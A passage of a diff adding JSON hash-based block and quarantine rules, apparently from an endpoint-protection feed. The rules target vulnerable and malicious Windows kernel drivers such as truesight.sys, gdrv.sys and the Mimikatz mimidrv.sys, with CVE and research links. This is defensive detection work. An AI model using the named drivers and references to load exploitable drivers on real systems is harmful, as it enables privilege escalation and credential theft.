+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487308Z",
+ "creation_date": "2026-03-23T11:45:31.487310Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487316Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a3a6b9ce2e106bfdb14cb1269c1f2f575c585ff36b3c69de2d4644a686939adf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d01af8fb-1a95-5e16-86d0-651f6d234e97",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830168Z",
+ "creation_date": "2026-03-23T11:45:30.830170Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830176Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "79458431181462c1144b57d82ad913575876cdd8706a497c71db197a42f03f04",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d033b9eb-fdc0-51ff-9f4f-ef98c83e746e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609503Z",
+ "creation_date": "2026-03-23T11:45:29.609505Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609511Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "35b1fdfa5cc9bb4a0d6e148140d59351447fa35c5c899e95da5f62a6b054af56",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d042018e-94da-543c-b5cc-cb0a939d5838",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143631Z",
+ "creation_date": "2026-03-23T11:45:32.143633Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143638Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "55b5bcbf8fb4e1ce99d201d3903d785888c928aa26e947ce2cdb99eefd0dae03",
+ "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d0493bf7-56bd-5ead-b4c9-b39f059ed711",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968150Z",
+ "creation_date": "2026-03-23T11:45:29.968152Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968157Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347",
+ "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) [https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d04aa591-d2d6-57c7-9120-7ea55a8cc728",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817817Z",
+ "creation_date": "2026-03-23T11:45:30.817820Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817827Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "03df432d7ff56ed53fd050b1875f5a05dffbe1c999adf2dd6c8d790b7ffd2c2d",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d04c93cd-9131-5b2c-83b6-1e86b4dd4e74",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978808Z",
+ "creation_date": "2026-03-23T11:45:29.978810Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978816Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "26536758c2247b6251a342d2e80de1753c006a0dce9b3b8a6a5b1d3110c8fc34",
+ "comment": "Vulnerable Kernel Driver (aka procexp152.sys) [https://www.loldrivers.io/drivers/0567c6c4-282f-406f-9369-7f876b899c25/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d0512981-146d-55d3-bf78-922ee5bb4151",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828720Z",
+ "creation_date": "2026-03-23T11:45:30.828722Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828728Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f7a83480526e5e8bbba2d70f20998a1fec54379e97bbe4dac071206f62c59c15",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d0545242-fe00-5d92-b6fd-9708bb597c7a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453161Z",
+ "creation_date": "2026-03-23T11:45:30.453165Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453175Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "76276c87617b836dd6f31b73d2bb0e756d4b3d133bddfe169cb4225124ca6bfb",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d05bb891-3652-5cdf-ad7d-22936c2fc818",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613512Z",
+ "creation_date": "2026-03-23T11:45:29.613514Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613519Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3f44442f56f2ceb6213fce103466862ac750fb99038030003c1b42da35a43a83",
+ "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d06835a0-027a-5118-a7ba-611302dd8f4a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474372Z",
+ "creation_date": "2026-03-23T11:45:31.474375Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474383Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cae1049a8fecdbbd851889fe654e624ea73ca17fb093ab47842098f16318d9ac",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d0784d77-2d5b-54ac-aa14-0dcbaa4eff37",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608910Z",
+ "creation_date": "2026-03-23T11:45:29.608912Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608917Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c9c86ba5ae540bb5729626cdaec89ca421f8129e4bbf6e1ea49c532b44ea0c9",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d07ac2df-d545-58bb-b2d7-26c26c5556d8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972861Z",
+ "creation_date": "2026-03-23T11:45:29.972863Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972880Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "851961d7d327f813b5038f111f4ef31a38f8939ee7256603ccaa43dd5df742ab",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d08f246d-4a52-55f3-8aef-34b2014050bb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467893Z",
+ "creation_date": "2026-03-23T11:45:30.467896Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467904Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d5f58cbce305cbd4397c1da5e1a51d78575c67616f6d9c7d764f87cda540fa62",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d08facc0-084d-51d0-9411-892415e3d826",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481042Z",
+ "creation_date": "2026-03-23T11:45:31.481046Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481056Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2635d308d65dd8a508926fa2ac7845d7484051a8a2124e32f265abb20a9221d0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d09a0234-aa8d-5970-85ab-8b81cba5e529",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613969Z",
+ "creation_date": "2026-03-23T11:45:29.613971Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613976Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7ea9b2420483183cf7b25d6577848f2dfe2ae064a61d931d6b8b65b31a1b2685",
+ "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d0ad21ce-2c8f-5c66-a6b2-6feada0fbda0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979895Z",
+ "creation_date": "2026-03-23T11:45:29.979896Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979902Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4b10f4f03eaa545d2fdb3b88890917a6fa24142689d3c43a7c39fc5bed5725bf",
+ "comment": "Malicious Kernel Driver (aka daxin_blank2.sys) [https://www.loldrivers.io/drivers/2e1531b2-d370-4543-9e2e-5319a1c13c22/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d0aef066-0b58-505a-a1a8-4f49216198f0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619388Z",
+ "creation_date": "2026-03-23T11:45:29.619390Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619395Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bc65d8ade2e72475a585307311e3058b3dbc4a7d2be6740c2c53a5902e698e7f",
+ "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d0b0a482-264f-5e6b-9743-6774f4571a36",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490471Z",
+ "creation_date": "2026-03-23T11:45:31.490473Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490479Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b9f4b0bde872ec87194f5519dac7dbddfec613002e4b2015ef035d7c46301a81",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d0b65c04-f43c-5147-b0f9-efca4cfc0ae6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984786Z",
+ "creation_date": "2026-03-23T11:45:29.984789Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984794Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0aafa9f47acf69d46c9542985994ff5321f00842a28df2396d4a3076776a83cb",
+ "comment": "Dangerous Physmem Kernel Driver (aka AsrRapidStartDrv.Sys) [https://www.loldrivers.io/drivers/19d16518-4aee-4983-ba89-dbbe0fa8a3e7/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d0c4b3a5-69df-5053-aa09-a5f09593d3a0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970600Z",
+ "creation_date": "2026-03-23T11:45:29.970602Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970607Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "183ce4afa337da0edf454b6d1ae4c7f3b517751540813063fd69aa7ccb9dd4c0",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d0e162de-e7be-5114-b747-0b17ee380eea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154316Z",
+ "creation_date": "2026-03-23T11:45:31.154317Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154323Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "76959cc4c02c08fe11c76a1390f5fe681470cb112b8e5dda1a07ebbf10f675f1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d0e2e060-c822-5e6e-b214-bb115e1e2cec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
